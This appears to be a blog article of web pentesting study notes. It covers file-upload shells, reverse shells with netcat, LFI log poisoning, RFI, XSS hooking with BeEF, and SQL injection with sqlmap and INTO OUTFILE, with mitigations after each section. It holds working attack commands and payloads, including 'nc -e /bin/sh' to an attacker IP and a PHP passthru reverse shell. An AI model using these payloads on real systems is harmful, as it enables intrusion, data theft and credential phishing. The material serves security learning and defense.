Subdomain investigation by vocabulary (knockpy)

Note: these tools are being used only for legal pentesting purposes.

git clone https://github.com/guelfoweb/knock.git
cd knock
# activate venv if needed
pip3 install -r requirements.txt
python3 knockpy.py <DOMAIN>

Files investigation by vocabulary (dirb)

dirb <URL> -o output.txt

File upload vulnerability (weevly)

generate a shell-accessing script:

weevly generate <ACCESSPASS> shell.php

Then try to upload this file using the "Upload" button on the website. Sometimes sites do not check for file extension (whether it is php or .jpg), sometimes they check extension incorrectly (Apache is known for incorrect processing of "double" extensions). Sometimes we may need to change Content-Type using Burpsuite proxy to image/jpeg or something, when the POST request is intercepted (manually). Once the file is uploaded, open it from the server, and then connect to the remote shell via weevly:

weevly <SERVER/FILE/LOCATION/shell.php> <ACCESSPASS>

we have a shell access to the server!

Mitigation:

1. Never allow uploading of the executable files (scripts, php, exe, etc).
2. Always check file type and extension of uploaded files.
3. Analyse file, its filesize, recreate (stripping all potentially harmful metadata), optimize (for example, resize image) for web-app, and rename the file.

Remote code execution

if it is possible to run a shell command on the server (missing input validation?) and commands being passed directly to shell, on our pc we can run:

nc -vv -l -p 8081

On the server we then run:

nc -e /bin/sh <OURPCIPADDRESS> 8081

The server then connects to us. This technique is called reverse shell.

How to run the command on the server? We can try to use ; <our command> or | <our command> to imitate pipe or multiple commands bash feature.

Having shell access, we can upload (pull) to the server any files using wget/curl.

Mitigation:

1. don't use functions that allow running arbitrary code on the server
2. Carefully verify/filter input data
3. It is clever to split the input to pieces and build it up again, carefully evaluating every piece of incoming data for correctness. And only then pass it to an executable function.

Local file inclusion (LFI)

When url allows specifying filename, we can specify arbitrary filename/path (e.g., /etc/passwd). We can possibly read logs, etc. Using LFI we can print /proc/self/environ, and this "file" contains user agent and other variables. Now, we can pass some <?php passthru("echo hello world from bash!") ?> code as part of user agent, which will be executed on the server side - and set up remote shell.

Similarly, if we can "print" log files (/var/log/auth.log or /var/log/apache2/access.log), we can add some <?php ... ?> code there, to make sure it gets executed when the requested file is rendered by LFI call. Sometimes, instead of sending direct netcat server command to passthru, we send it base64encoded (and apply base64_decode() php function later), so we avoid using forbidden chars in the log.

Remote file inclusion

Similarly, when the url allows specifying file path located on a remote server, we can including some php code with in such file, and pass the link to the server being attacked.

Sometimes we need to bypass server filtering, by using different casing (hTTp instead of http). In general, filters can always be bypassed.

Mitigation: allow static file inclusion only (and prevent local/remote file inclusion). Static file inclusion means, specifying files in code, not allowing user to specify random included php files in GET/POST requests. If we allow specifying arbitrary filenames, always compare the requested filename with the strict list of allowed files!

CSRF (cross site request forgery)

Mitigation: We need to make sure the user actually made the request, instead of request being made on his behalf by some third-party server or file/page.

• Always request password on password change or other important actions
• Use unique token for each request (generated based on the userid and based on the request data and some constant secret string), and send hash for it:

Token = sha256hash(userid+requestid+secretstring)

Now the server, having received this token back, can re-calculate this token and compare to the token received from client. This is how the server will know, that the request, initiated by the client, was originally initiated by our server

XSS (Cross site scripting)

Executing arbitrary JS code on the client side (loaded either from a db (persistent), from url (reflected) or DOM based).

JS code can be embedded not only using <script> tag, but also inside <img src=/ onerror="jscode..."> and handlers like that.

See https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet for other techniques.

If the XSS doesnt involve sending requests to the server, it is called a DOM XSS.

Persistent (stored in database) xss is dangerous, because any user visiting website gets the script executed automatically (including the admin, who visits it often for audits). Temporary (reflected) xss is not stored anywhere, but is executed only when user visits some link.

XSS can be exploited using linux beef-xss package. On the website we embed a script string, something like <script src="http://<ipwithrunningbeef>:3000/hook.js"></script>, then all the users that open the website automatically connect to our beef server.

Once beef script js module has been injected onto the page, we can see a "zombie browser" in the list on the computer where beef server had been launched. What we can do now:

• redirect browser to any page (for example, youtube video)
• execute arbitrary js code, including alerts
• take screenshot of the webpage the user is viewing
• show alert dialog
• present fake youtube/facebook/etc login screens and get the username/password
• trick the user into running an .exe binary (by showing fake "install plugin" notification)

And many more other modules from the "commands" tab.

XSS Vumnerability mitigation: Any input parameter (strings, ids, urls) must be filtered by escaping dangerous characters (like, replacing dangerous chars). As a user, do not launch suspicious binaries. Ignore "you've been logged out" windows.

See https://cheatsheetseries.owasp.org/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html

SQL Injection

• Test websites for vulnerability: try applying ’, # (sql comment character that makes sql parser ignore the rest of the string), also and 1=1, and 0=1, or 1=1 clauses.

If the filtering of the characters is done on the client side, use burp proxy to modify raw request manually. In general burp proxy allows examining and modifying any get/post requests made by a web browser

• Symbol # (sql comment) has url code %23
• We may insert "order by N" statement ("order output by column with 1-based index N), by picking N we can figure out how many columns are there in the table.
• Then inject union select 1,2,3,4,5,...,N to figure out which columns are being output to the HTML document. Then union select 1,2,3, database(), user(), version() to retrieve needed info about the database. There is also union select 1,2,3, table_name, 4, 5 from information_schema.tables. We could also call load_file('/etc/passwd') as part of the union select request.
• In general using union select clause we can get a lot of service information from the database (list databases, tables, table columns, etc)
• If the server doesn't output errors for mistaken sql requests, using ' wouldn't help to detect sql injection possibility. We should use ' and 1=1 and ' and 1=0 to detect it.
• sometimes server filters out ' characters in the request. Then we can try to use hex name with 0x prefix (like, where table_schema = 0x11223344)
• sometimes server shows only a single record. Then in our SQL queries we can use LIMIT 2,3 (to show records between 2 and 3)
• apart from getting file data (load_file('filepath')) we can save text data into a file, doing something like this (often mysql isn't allowed writing to folders like /var/www.):

union select null, 'some text', null, null, null into outfile '/var/tmp/myfile.txt'

• we can write something like union select '<?passthru("nc -e /bin/sh SERVER_IP 8080");?>', null into outfile '/var/tmp/reverse.php', and then somehow launch the file using another website's vulnerability.
• There is a command in Kali that given a URL with GET params in it, searches for vulnerabilities and does SQL Injection automatically. It has commands to get list of databases, tables, etc:

 sqlmap -u <url_with_get_params>
 sqlmap -u ... -D databasename --tables
 sqlmap -u ... -D databasename -T tablename --dump

• sqlmap also allows uploading shell to the vulnerable server, using --os-shell argument (if mysql has permissions for saving files).
• sqlmap also has --sql-shell, that allows executing arbitrary SQL expressions.

Mitigation:

• filters are not effective, there is always a way to bypass a "black list" of characters and keywords. For example, using jumpy casing (orDer). Filtering spaces is not effective, as they can be replaced by + or /**/. For comments we can use #, --, /*, '//', sometimes we need to add ; or url encoded vals.
• as a quick solution, we must escape string that comes from the user, and put it inside quotes when doing SELECT request.
• the best way to avoid SQL injection is to use sql parameters, instead of concatenating strings.

Extra tips:

• For every database use separate user with minimal set of rights.
• Do not allow users do what they want - only allow what's necessary. Allow user the least rights.

← Back to Articles